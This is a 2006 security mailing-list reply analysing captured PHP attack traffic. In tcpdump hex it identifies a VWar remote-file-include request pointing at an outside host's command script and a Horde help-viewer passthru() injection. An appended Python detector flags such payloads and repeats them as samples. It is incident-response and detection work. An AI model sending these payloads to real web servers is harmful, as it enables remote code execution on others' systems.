Network Security Incidents

Re: Someone scanning for new PHP issues?

Subject: Re: Someone scanning for new PHP issues?
Date: Sun, 16 Apr 2006 21:53:17 +1200
On 4/16/06, Jamie Riden <jamesr@europe.com> wrote:
One of these might be the Horde exploit-
http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?

cheers,
 Jamie

02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P
0:412(412) ack 1 win 65535
       0x0000:  4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1  E.....@.q.P.....
       0x0010:  48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d  H..J...P..U"..*.
       0x0020:  5018 ffff 3431 0000 4745 5420 6874 7470  P...41..GET.http
       0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
       0x0040:  7677 6172 2f69 6e63 6c75 6465 732f 6765  vwar/includes/ge
       0x0050:  745f 6865 6164 6572 2e70 6870 3f76 7761  t_header.php?vwa
       0x0060:  725f 726f 6f74 3d68 7474 703a 2f2f 7870  r_root=http://xp
       0x0070:  6c2e 6e65 746d 6973 7068 6572 6532 2e63  l.netmisphere2.c
       0x0080:  6f6d 2f43 4d44 2e67 6966 3f26 636d 643d  om/CMD.gif?&cmd=
       0x0090:  7767 6574 2048 5454 502f 312e 300d 0a48  wget.HTTP/1.0.

This is a VWar vulnerability in the get_header.php file (remote file
include vulnerability). More info at
http://www.securityfocus.com/bid/17358/info.

02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P
1205950111:1205950537(426) ack 2648749032 win 65535
       0x0000:  4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1  E.....@.r.N.....
       0x0010:  48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8  H..J...PG.V.....
       0x0020:  5018 ffff 1fd8 0000 4745 5420 6874 7470  P.......GET.http
       0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
       0x0040:  7765 626d 6169 6c2f 686f 7264 652f 7365  webmail/horde/se
       0x0050:  7276 6963 6573 2f68 656c 702f 3f73 686f  rvices/help/?sho
       0x0060:  773d 6162 6f75 7426 6d6f 6475 6c65 3d3b  w=about&module=;
       0x0070:  2532 322e 7061 7373 7468 7275 2825 3232  %22.passthru(%22
       0x0080:  6563 686f 2532 3049 524f 434b 5448 4557  echo%20IROCKTHEW
       0x0090:  4f52 4c44 2532 3229 3b27 2e20 4854 5450  ORLD%22);'..HTTP
       0x00a0:  2f31 2e30 0d0a 486f 7374 3a20 3732 2e32  /1.0..Host:.72.2
       0x00b0:  3332 2e33 302e 3734 0d0a 5265 6665 7265  32.30.74..

This is, as you wrote above, the Horde Help Viewer remote PHP code
execution vulnerability. More info at
http://www.securityfocus.com/bid/17292.

Unfortunately exploits are in the wild, and the Horde one is
especially bad (knowing that Horde is used a lot).

Cheers,

Bojan
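Both captures above are `tcpdump -X` output, and the indicator of compromise sits inside the HTTP request line: a query parameter whose value is a remote URL (the VWar `vwar_root=http://...` remote file include) or one that carries a PHP function call (the Horde `module=;%22.passthru(...)` code injection). The following is an added example, not code from this thread or from either poster, showing how a responder can turn such dump lines back into bytes, skip the IPv4/TCP headers using their own length fields, and flag both patterns. The three sample requests and the dump lines rendered from them are constructed here so the script runs offline (the list posts themselves have masked octets such as `xx` and `yyyy`, which would have to be restored before the hex column parses); the host `rfi-host.invalid` is a placeholder.

```python
"""Reassemble an HTTP request from tcpdump -X lines and flag RFI / PHP code-injection indicators."""
import re
import struct
from urllib.parse import unquote_plus, urlsplit

# Hex column of a tcpdump -X line: offset, then groups of 4 hex digits (last may be 2).
HEX_LINE = re.compile(r"^\s*0x[0-9a-fA-F]+:\s*((?:[0-9a-fA-F]{4}\s)*[0-9a-fA-F]{2,4})")
CODE_CALLS = re.compile(r"\b(passthru|system|exec|shell_exec|eval)\s*\(", re.I)
URL_SCHEME = re.compile(r"^(https?|ftp)://", re.I)


def dump_to_bytes(lines):
    """Collect the hex column of tcpdump -X lines into one byte string (ASCII column ignored)."""
    out = bytearray()
    for line in lines:
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def tcp_payload(packet):
    """Skip the IPv4 header (IHL field) and the TCP header (data offset field)."""
    ihl = (packet[0] & 0x0F) * 4
    data_off = (packet[ihl + 12] >> 4) * 4
    return packet[ihl + data_off:]


def analyse_request(payload):
    """Return (request line, list of findings) for an HTTP request payload."""
    request_line = payload.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) < 2:
        return request_line, ["not an HTTP request line"]
    findings = []
    # Split the query by hand: parse_qsl treated ';' as a separator on old Pythons,
    # which would hide the Horde payload ('module=;...').
    query = urlsplit(parts[1]).query
    for field in query.split("&"):
        if "=" not in field:
            continue
        name, value = field.split("=", 1)
        value = unquote_plus(value)
        if URL_SCHEME.match(value):
            findings.append(f"remote URL in parameter {name!r}: possible remote file inclusion")
        if CODE_CALLS.search(value):
            findings.append(f"PHP call in parameter {name!r}: possible code injection")
    return request_line, findings


def _constructed_dump(http_request):
    """Wrap a request in minimal IPv4/TCP headers and render it the way tcpdump -X does (sample only)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(http_request), 0, 0x4000, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 1044, 80, 1, 1, 0x50, 0x18, 65535, 0, 0)
    pkt = ip + tcp + http_request
    lines = []
    for off in range(0, len(pkt), 16):
        chunk = pkt[off:off + 16]
        hexcol = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"\t0x{off:04x}:  {hexcol:<39}  {ascii_col}")
    return lines


# Constructed sample requests modelled on the two captures in the thread plus a benign one.
SAMPLES = {
    "vwar_rfi": (b"GET http://www.example.com/vwar/includes/get_header.php"
                 b"?vwar_root=http://rfi-host.invalid/CMD.gif?&cmd=wget HTTP/1.0\r\n"
                 b"Host: www.example.com\r\n\r\n"),
    "horde_help": (b"GET /webmail/horde/services/help/?show=about"
                   b"&module=;%22.passthru(%22echo%20IROCKTHEWORLD%22);'. HTTP/1.0\r\n"
                   b"Host: www.example.com\r\n\r\n"),
    "benign": b"GET /index.php?page=about HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
}


def scan_sample(name):
    """Render one sample as tcpdump -X lines, parse it back, and analyse the request."""
    return analyse_request(tcp_payload(dump_to_bytes(_constructed_dump(SAMPLES[name]))))


if __name__ == "__main__":
    for name in SAMPLES:
        request_line, findings = scan_sample(name)
        print(name, "->", request_line)
        for f in findings:
            print("   ", f)
```

On real captures, feed `dump_to_bytes` the lines of one packet at a time; the URL check catches the classic `?param=http://` include attempts regardless of which script is targeted, and the function-call check catches the quote-and-call injection style used against the Horde help viewer.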
